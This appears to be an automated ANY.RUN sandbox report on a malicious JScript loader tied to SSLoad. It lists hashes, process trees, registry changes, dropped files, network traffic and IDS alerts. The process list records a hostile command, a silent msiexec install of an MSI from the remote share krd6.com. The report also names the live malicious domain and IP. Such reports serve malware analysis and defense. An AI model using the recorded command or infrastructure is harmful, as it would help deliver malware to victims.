File name:

092962bc268390debf17cd148d03147cdf919e442e61c92de01eac3bdb34b1c1.js

Full analysis: https://app.any.run/tasks/f4f168a1-a64f-40c6-b9ae-66ae5860258a
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: April 17, 2024, 14:47:56
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
webdav
loader
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (547), with CRLF line terminators
MD5:

D174E68FE3458262E53DEE5036EEB15E

SHA1:

9629E313A6299E600FF2C6086A24E3AD6FF6BA59

SHA256:

092962BC268390DEBF17CD148D03147CDF919E442E61C92DE01EAC3BDB34B1C1

SSDEEP:

12288:r0PIO52rUkKgsPBQtW9iAm4pc6bD4QscB4gefCsDIP4lU:r3OdkFsmt0iAHNbMQsq4golEOU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Opens a text file (SCRIPT)

      • wscript.exe (PID: 6308)
    • Unusual connection from system programs

      • wscript.exe (PID: 6308)
    • Drops the executable file immediately after the start

      • msiexec.exe (PID: 4220)
  • SUSPICIOUS

    • Gets full path of the running script (SCRIPT)

      • wscript.exe (PID: 6308)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 6308)
    • Creates an object to access WMI (SCRIPT)

      • wscript.exe (PID: 6308)
    • Checks whether a specific file exists (SCRIPT)

      • wscript.exe (PID: 6308)
    • Executed via WMI

      • msiexec.exe (PID: 1564)
    • Writes binary data to a Stream object (SCRIPT)

      • wscript.exe (PID: 6308)
    • Reads data from a binary Stream object (SCRIPT)

      • wscript.exe (PID: 6308)
    • Uses WMI to retrieve WMI-managed resources (SCRIPT)

      • wscript.exe (PID: 6308)
    • Uses pipe srvsvc via SMB (transferring data)

      • msiexec.exe (PID: 4220)
    • Reads security settings of Internet Explorer

      • msiexec.exe (PID: 4220)
    • Reads the Windows owner or organization settings

      • msiexec.exe (PID: 4220)
    • Connects to the server without a host name

      • msiexec.exe (PID: 5024)
  • INFO

    • Checks proxy server information

      • wscript.exe (PID: 6308)
    • Checks supported languages

      • msiexec.exe (PID: 4220)
      • msiexec.exe (PID: 5024)
    • Reads the computer name

      • msiexec.exe (PID: 4220)
      • msiexec.exe (PID: 5024)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 4220)
    • Reads the software policy settings

      • msiexec.exe (PID: 5024)
      • slui.exe (PID: 1164)
    • Reads Environment values

      • msiexec.exe (PID: 5024)
    • Creates files or folders in the user directory

      • msiexec.exe (PID: 4220)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
134
Monitored processes
7
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe msiexec.exe no specs sppextcomobj.exe no specs slui.exe msiexec.exe msiexec.exe slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1164"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
1564msiexec.exe /i \\krd6.com@80\share\avp.msi /qnC:\Windows\System32\msiexec.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
2056C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
4220C:\WINDOWS\system32\msiexec.exe /VC:\Windows\System32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
5024C:\Windows\syswow64\MsiExec.exe -Embedding CD7A34DC482123641F2C4FF44B0503E8C:\Windows\SysWOW64\msiexec.exe
msiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\aclayers.dll
6308"C:\Windows\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\092962bc268390debf17cd148d03147cdf919e442e61c92de01eac3bdb34b1c1.jsC:\Windows\System32\wscript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6516C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
Total events
7 812
Read events
7 777
Write events
35
Delete events
0

Modification events

(PID) Process:(6308) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(6308) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(6308) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(6308) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(6308) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation:writeName:JScriptSetScriptStateStarted
Value:
1504420000000000
(PID) Process:(4220) msiexec.exeKey:HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(4220) msiexec.exeKey:HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(4220) msiexec.exeKey:HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(4220) msiexec.exeKey:HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(4220) msiexec.exeKey:HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\RestartManager\Session0000
Operation:writeName:Owner
Value:
7C100000A3A5F361D690DA01
Executable files
6
Suspicious files
4
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
4220msiexec.exeC:\WINDOWS\Installer\inprogressinstallinfo.ipi
MD5:
SHA256:
6308wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9CB4373A4252DE8D2212929836304EC5_1AB74AA2E3A56E1B8AD8D3FEC287554Eder
MD5:C819852964922B191BAFB2CE87B3E7BA
SHA256:D746DBDB991CDA22E11772DE2860D434B066B494EEE6E40E00CBD7F80BF4CBFB
6308wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9CB4373A4252DE8D2212929836304EC5_1AB74AA2E3A56E1B8AD8D3FEC287554Ebinary
MD5:FE90B2F23B5E0267D31078CC7E766CDC
SHA256:485379C9173F1328CD122CE00C441906B488C0E24CE359A62933A34D857DCF27
4220msiexec.exeC:\WINDOWS\Installer\420677.msiexecutable
MD5:4D81BE09C23E02FAB7364E508C21C111
SHA256:DCAE57EC4B69236146F744C143C42CC8BDAC9DA6E991904E6DBF67EC1179286A
4220msiexec.exeC:\WINDOWS\Installer\MSI781.tmpexecutable
MD5:475D20C0EA477A35660E3F67ECF0A1DF
SHA256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
4220msiexec.exeC:\WINDOWS\Installer\MSI850.tmpbinary
MD5:BA7F2CC1DAFDE52BDA81533F54B5ED8F
SHA256:6EBB3EAAE254A522FC13CFE4985E31B9BD344EF5B09F7166C8448298981B160D
6308wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\357F04AD41BCF5FE18FCB69F60C6680F_D51703210E24E5BE9834FB730147157Fbinary
MD5:0D4F5049FAA2E3B558F6A33B18F999B3
SHA256:7CB298C8E097F790B5622FA18DD98BB704F6B528E8F4D7A5D872D1EA4D7D21FF
4220msiexec.exeC:\WINDOWS\TEMP\~DFEFEFF3422BA6E987.TMPbinary
MD5:0ACA25A4415AA780B47006E3E274738F
SHA256:C31C6EFB9D49233FF35C7766C1F676484F8EB9A82EBEE6BB002C4727EFFE6813
4220msiexec.exeC:\WINDOWS\Installer\MSI7E1.tmpexecutable
MD5:475D20C0EA477A35660E3F67ECF0A1DF
SHA256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
4220msiexec.exeC:\Users\admin\AppData\Local\sharepoint\forcedelctl.dllexecutable
MD5:B28A478EB5B99EFCDC7CAF428BFFB89A
SHA256:3BCA1DCAEF4430272B9029C9A4BC8BE0D45ECFF66E8DE8679ED30D8AFAB00F6F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
32
TCP/UDP connections
52
DNS requests
19
Threats
10

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
6308
wscript.exe
GET
200
104.18.20.226:80
http://ocsp.globalsign.com/gsgccr45evcodesignca2020/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQaCbVYh07WONuW4e63Ydlu4AlbDAQUJZ3Q%2FFkJhmPF7POxEztXHAOSNhECDESE8cW2py3%2BwOHKVQ%3D%3D
unknown
unknown
6308
wscript.exe
OPTIONS
200
87.249.49.206:80
http://krd6.com/
unknown
unknown
6308
wscript.exe
GET
200
104.18.20.226:80
http://ocsp.globalsign.com/codesigningrootr45/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQVFZP5vqhCrtRN5SWf40Rn6NM1IAQUHwC%2FRoAK%2FHg5t6W0Q9lWULvOljsCEHe9DgW3WQu2HUdhUx4%2Fde0%3D
unknown
unknown
7148
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
unknown
2452
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
unknown
2452
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
unknown
1280
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
unknown
4308
svchost.exe
OPTIONS
200
87.249.49.206:80
http://krd6.com/share
unknown
unknown
4308
svchost.exe
PROPFIND
207
87.249.49.206:80
http://krd6.com/share
unknown
unknown
4308
svchost.exe
PROPFIND
207
87.249.49.206:80
http://krd6.com/share
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4008
svchost.exe
239.255.255.250:1900
unknown
7148
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6308
wscript.exe
104.18.20.226:80
ocsp.globalsign.com
CLOUDFLARENET
shared
3536
RUXIMICS.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5152
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
7148
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
unknown
6308
wscript.exe
87.249.49.206:80
krd6.com
TimeWeb Ltd.
RU
unknown
3196
svchost.exe
40.115.3.253:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1280
svchost.exe
20.190.159.71:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
ocsp.globalsign.com
  • 104.18.20.226
  • 104.18.21.226
whitelisted
krd6.com
  • 87.249.49.206
unknown
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 184.30.21.171
whitelisted
client.wns.windows.com
  • 40.115.3.253
whitelisted
login.live.com
  • 20.190.159.71
  • 20.190.159.4
  • 40.126.31.67
  • 20.190.159.68
  • 40.126.31.73
  • 20.190.159.23
  • 20.190.159.73
  • 40.126.31.71
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
slscr.update.microsoft.com
  • 13.85.23.86
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted
nexusrules.officeapps.live.com
  • 52.111.229.43
whitelisted

Threats

PID
Process
Class
Message
4308
svchost.exe
Misc activity
ET HUNTING Successful PROPFIND Response for Application Media Type
Misc activity
ET HUNTING Successful PROPFIND Response for Application Media Type
2136
svchost.exe
Misc activity
ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup
5024
msiexec.exe
Misc activity
ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI
A Network Trojan was detected
ET MALWARE Win32/SSLoad Registration Activity (POST)
A Network Trojan was detected
ET MALWARE Win32/SSLoad Tasking Request (POST)
A Network Trojan was detected
ET MALWARE Win32/SSLoad Module Request (GET)
A Network Trojan was detected
ET MALWARE Win32/SSLoad Tasking Request (POST)
A Network Trojan was detected
ET MALWARE Win32/SSLoad Tasking Request (POST)
1 ETPRO signatures available at the full report
No debug info